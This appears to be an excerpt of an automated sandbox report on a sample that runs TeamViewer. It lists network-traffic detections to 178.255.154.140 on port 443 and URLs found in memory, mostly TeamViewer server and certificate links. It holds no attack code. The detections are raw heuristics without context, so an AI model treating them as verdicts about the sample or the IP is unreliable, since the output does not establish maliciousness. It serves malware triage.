Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822

Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: unknown	TCP traffic detected without corresponding DNS query: 178.255.154.140

Source: TeamViewer.exe, 00000006.00000003.365826240.000000000575A000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.280519972.000000000570A000.00000004.00000001.sdmp	String found in binary or memory: http://178.255.154.140/din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: http://178.255.154.140/din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001.
Source: TeamViewer.exe, 00000006.00000003.291353124.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: http://178.255.154.140/din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001.Windows.Phot
Source: TeamViewer.exe, 00000006.00000003.291353124.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: http://178.255.154.140/din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001p
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: http://178.255.154.140/din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001y#U
Source: TeamViewer.exe, 00000006.00000002.530437630.0000000003A1C000.00000004.00000001.sdmp	String found in binary or memory: http://178.255.154.140/din.aspx?s=12652280&m=fast&client=DynGate&p=1000
Source: TeamViewer.exe, 00000006.00000003.376075558.0000000005749000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.280800923.000000000570A000.00000004.00000001.sdmp	String found in binary or memory: http://178.255.154.140/din.aspx?s=12652280&m=fast&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000006.00000003.281018743.0000000005748000.00000004.00000001.sdmp	String found in binary or memory: http://178.255.154.140/din.aspx?s=12652280&m=fast&client=DynGate&p=10000002ter15.teamviewer.com
Source: TeamViewer.exe, 00000006.00000003.281018743.0000000005748000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.329170945.000000000569B000.00000004.00000001.sdmp	String found in binary or memory: http://178.255.154.140/dout.aspx?s=12652280&p=10000001&client=DynGate
Source: TeamViewer.exe, 00000006.00000003.281018743.0000000005748000.00000004.00000001.sdmp	String found in binary or memory: http://178.255.154.140/dout.aspx?s=12652280&p=10000001&client=DynGatet
Source: TeamViewer.exe, 00000006.00000003.281018743.0000000005748000.00000004.00000001.sdmp	String found in binary or memory: http://178.255.154.140/dout.aspx?s=12652280&p=10000001&client=DynGateu
Source: TeamViewer.exe, 00000006.00000002.530437630.0000000003A1C000.00000004.00000001.sdmp	String found in binary or memory: http://178.255.154.140/dout.aspx?s=12652280&p=10000002&client
Source: TeamViewer.exe, 00000006.00000003.376075558.0000000005749000.00000004.00000001.sdmp	String found in binary or memory: http://178.255.154.140/dout.aspx?s=12652280&p=10000002&client=DynGate
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp	String found in binary or memory: http://178.255.154.140/dout.aspx?s=12652280&p=10000002&client=DynGate-Out)LMEMX
Source: TeamViewer.exe, 00000006.00000003.376075558.0000000005749000.00000004.00000001.sdmp	String found in binary or memory: http://178.255.154.140/dout.aspx?s=12652280&p=10000002&client=DynGatet
Source: TeamViewer.exe, 00000006.00000002.533222277.0000000005790000.00000004.00000001.sdmp	String found in binary or memory: http://178.255.154.140/ent=DynGate&p=10000002
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.524829525.000002B018288000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: svchost.exe, 00000005.00000002.524829525.000002B018288000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: svchost.exe, 00000005.00000002.524829525.000002B018288000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ver)
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://go.teamviewer.comn0
Source: TeamViewer.exe, 00000006.00000003.274797829.0000000005791000.00000004.00000001.sdmp	String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001
Source: TeamViewer.exe, 00000006.00000002.526646142.0000000000B86000.00000004.00000020.sdmp	String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001:
Source: TeamViewer.exe, 00000006.00000002.526646142.0000000000B86000.00000004.00000020.sdmp	String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001H5
Source: TeamViewer.exe, 00000006.00000002.526646142.0000000000B86000.00000004.00000020.sdmp	String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001H;t
Source: TeamViewer.exe, 00000006.00000003.274797829.0000000005791000.00000004.00000001.sdmp	String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001c6
Source: TeamViewer.exe, 00000006.00000003.291353124.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001h
Source: TeamViewer.exe, 00000006.00000003.274699335.000000000577F000.00000004.00000001.sdmp	String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001j
Source: TeamViewer.exe, 00000006.00000002.533222277.0000000005790000.00000004.00000001.sdmp	String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001
Source: TeamViewer.exe, 00000006.00000002.533222277.0000000005790000.00000004.00000001.sdmp	String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=7666614&p=100000012
Source: TeamViewer.exe, 00000006.00000003.291353124.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001Windows.Phot
Source: TeamViewer.exe, 00000006.00000002.526646142.0000000000B86000.00000004.00000020.sdmp	String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001m
Source: TeamViewer.exe, 00000006.00000002.533222277.0000000005790000.00000004.00000001.sdmp	String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001s
Source: TeamViewer.exe, 00000006.00000002.526646142.0000000000B86000.00000004.00000020.sdmp	String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001w
Source: TeamViewer.exe, 00000006.00000003.281018743.0000000005748000.00000004.00000001.sdmp	String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=39260701&client=DynGate&p=10000002g
Source: TeamViewer.exe, 00000006.00000003.281018743.0000000005748000.00000004.00000001.sdmp	String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=39260719&client=DynGate&p=10000002w
Source: TeamViewer.exe, 00000006.00000003.281018743.0000000005748000.00000004.00000001.sdmp	String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=39260736&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000006.00000003.291353124.000000000575A000.00000004.00000001.sdmp	String found in binary or memory: http://master15.teamviewer.com/dout.aspx?s=39260701&p=10000001&client=DynGate&data=FyQSiQCjHqkys5Mko
Source: TeamViewer.exe, 00000006.00000003.376075558.0000000005749000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000002.533222277.0000000005790000.00000004.00000001.sdmp	String found in binary or memory: http://master15.teamviewer.com/dout.aspx?s=39260710&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6s
Source: TeamViewer.exe, 00000006.00000002.533222277.0000000005790000.00000004.00000001.sdmp	String found in binary or memory: http://master15.teamviewer.com/dout.aspx?s=39260719&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s
Source: TeamViewer.exe, 00000006.00000002.530437630.0000000003A1C000.00000004.00000001.sdmp	String found in binary or memory: http://mastr15.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=7
Source: TeamViewer.exe, 00000006.00000002.530437630.0000000003A1C000.00000004.00000001.sdmp	String found in binary or memory: http://mastr15.teamviewer.com/din.aspx?s=3260736&client=DynGate&p=100
Source: 77Etc0bR2v.exe, 77Etc0bR2v.exe, 00000001.00000002.248818109.0000000000409000.00000004.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 77Etc0bR2v.exe, 00000001.00000002.248818109.0000000000409000.00000004.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: TeamViewer.exe, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp	String found in binary or memory: http://www.TeamViewer.com
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.TeamViewer.com#http://www.TeamViewer.com/licensing
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.TeamViewer.com/download
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.TeamViewer.com/help
Source: svchost.exe, 0000000C.00000002.310085553.000002A416213000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.267735353.00000000027A0000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.339483169.0000000000B3B000.00000004.00000020.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.353785890.00000000026C0000.00000004.00000001.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000003.337867986.0000000002661000.00000004.00000001.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000002.366214555.0000000000BDB000.00000004.00000020.sdmp	String found in binary or memory: http://www.teamviewer.com
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp	String found in binary or memory: http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.teamviewer.com/company/index.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.teamviewer.com/download/beta.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.teamviewer.com/download/version_4x/TeamViewerQS.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.teamviewer.com/favicon.ico
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.teamviewer.com/help/connectivity.aspx:
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.teamviewer.com/help/support.aspxK
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx
Source: TeamViewer.exe, 00000006.00000002.526986525.0000000002610000.00000004.00000001.sdmp	String found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx?version=
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp	String found in binary or memory: http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%
Source: TeamViewer.exe, 00000006.00000002.526986525.0000000002610000.00000004.00000001.sdmp	String found in binary or memory: http://www.teamviewer.com/ja/licensing/commercialuse.aspx
